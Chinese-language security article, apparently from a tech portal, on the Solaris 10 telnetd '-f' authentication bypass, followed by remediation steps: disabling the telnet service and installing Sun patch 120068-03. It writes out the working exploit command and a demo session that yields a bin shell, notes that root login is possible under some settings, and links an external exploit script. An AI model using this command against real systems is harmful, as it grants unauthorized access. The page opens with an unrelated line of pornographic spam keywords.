自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

聽高手談telnet安全漏洞

作者:佚名
網(wǎng)絡(luò) 網(wǎng)絡(luò)管理
telnet安全漏洞的問題如何解決呢?首先我們來了解一下目前telnet安全漏洞的情況,然后再看看高手是如何處理的。

telnet安全問題一直是我們重點關(guān)注的問題。那么今天我們就來討論一下telnet安全漏洞的內(nèi)容。那么來了解一下telnet安全漏洞的基本情況。早期Solaris 2.6、7 和 8 的 telnetd存在一個漏洞, 可以通過/bin/login的環(huán)境變數(shù) TTYPROMPT 繞過驗證,導(dǎo)致無需身份認證即可登錄。最近,Solaris 10的telnet又被發(fā)現(xiàn)出現(xiàn)了漏洞,Sun也及時推出了補丁。

我們先來看問題的癥狀。漏洞出現(xiàn)的系統(tǒng)環(huán)境為Solaris 10及以后版本,安裝時沒有選擇默認安裝。漏洞表現(xiàn)為通過在Solaris的telnet命令的-l選項后指定任意一個“-fusername”參數(shù),就可以直接登錄進入Solaris系統(tǒng)。

命令格式:

  1. telnet -l "-fbin" target_address 

下面是通過telnet安全漏洞以bin用戶登錄系統(tǒng)的演示。

  1. # telnet -l "-fbin" myhost  
  2. Trying 172.21.60.120...  
  3. Connected to myhost.  
  4. Escape character is '^]'.  
  5. Sun Microsystems Inc.  SunOS 5.10 Generic January 2005  
  6. $ id -a  
  7. uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

如果管理員修改了/etc/default/login文件,在注釋掉CONSOLE行允許root遠程登錄的情況下,訪問者可以利用該漏洞直接以root登錄系統(tǒng),這樣對系統(tǒng)危害更大。

Kingcope最早給出了在OpenSolaris中發(fā)現(xiàn)的該漏洞的源代碼,并稱其為“0day”-零日漏洞。文章地址為:http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

該文章中提供一個腳本,運行后用戶可以獲得被登錄系統(tǒng)的adm用戶權(quán)限。

解決方法:

1. 禁止Solaris 10的telnet服務(wù)。

檢查本機的telnet服務(wù)是否啟動。

  1. # svccfg list | grep telnet  
  2. network/telnet  
  3. # svcs -l network/telnet  
  4. fmri svc:/network/telnet:default  
  5. name Telnet server  
  6. enabled true  
  7. stateonline  
  8. next_state  none  
  9. state_time  Mon Feb 26 03:50:13 2007  
  10. restartersvc:/network/inetd:default 

禁止telnet服務(wù)。

  1. # svcadm disable svc:/network/telnet:default 

2. 下載安裝Sun的安全補?。ㄐ鑃un服務(wù)支持)。

Sun的技術(shù)支持工程師Alan Hargreaves在他2月13日的BLOG:http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

中提到,最終解決該問題的補丁120068-03已經(jīng)發(fā)布。通過Solaris 10的Update Manager可以下載安裝該補丁,如圖所示。這里可以看到該補丁是2月21日發(fā)布的。

telnet漏洞

需要說明的是Solaris 10的補丁,除了Security和hardware相關(guān)補丁可以免費下載,其它都是要服務(wù)支持的,就是Sun Service Plan。但是對于知道Patch號的,可以從http://sunsolve.sun.com中單個下載。這里可以在sunsolve上用PatchFinder查找120068-03補丁并下載,安裝到系統(tǒng)中。

安裝補丁后系統(tǒng)漏洞被禁止。

  1. # showrev -p | grep 120068  
  2. Patch: 120068-01 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  3. Patch: 120068-03 Obsoletes: Requires: Incompatibles: Packages: SUNWtnetd  
  4. # telnet -l "-fbin" myhost  
  5. Trying 172.21.60.120...  
  6. Connected to myhost.  
  7. Escape character is '^]'.  
  8. Password: 

需要用戶輸入密碼登錄,可見當(dāng)前Solaris 10系統(tǒng)的telnet安全漏洞被修正。

對新發(fā)現(xiàn)的Solaris 10的telnet安全漏洞,Sun的反應(yīng)還算迅速,立刻推出了相應(yīng)補丁程序。這里也可以看見,任何操作系統(tǒng)都是有Bug存在的,Sun通過OpenSolaris開源,使得系統(tǒng)的bug能盡快被發(fā)現(xiàn)和完善。

責(zé)任編輯:佟健 來源: 網(wǎng)絡(luò)整理
telnet安全漏洞
相關(guān)推薦

2010-07-26 15:37:12

telnet安全漏洞

2009-11-17 10:20:01

Oracle Spat

2014-06-03 09:23:41

2014-06-03 11:36:18

2020-10-09 09:52:00

漏洞分析

2009-03-07 09:59:16

2011-12-26 11:22:48

2021-05-12 10:46:23

漏洞BINDDNS服務(wù)器

2010-03-05 15:46:05

2022-07-06 11:50:43

漏洞網(wǎng)絡(luò)攻擊

2023-12-31 09:06:08

2024-06-07 15:26:22

2010-03-25 17:31:16

2010-12-13 12:35:56

職場

2009-11-02 18:56:49

調(diào)整Oracle數(shù)據(jù)庫

2009-12-03 15:24:39

雙wan路由器設(shè)置

2023-05-29 14:47:46

語音詐騙漏洞人工智能

2009-05-13 09:49:07

2014-03-02 15:06:33

2010-08-30 13:07:31

點贊
收藏

51CTO技術(shù)棧公眾號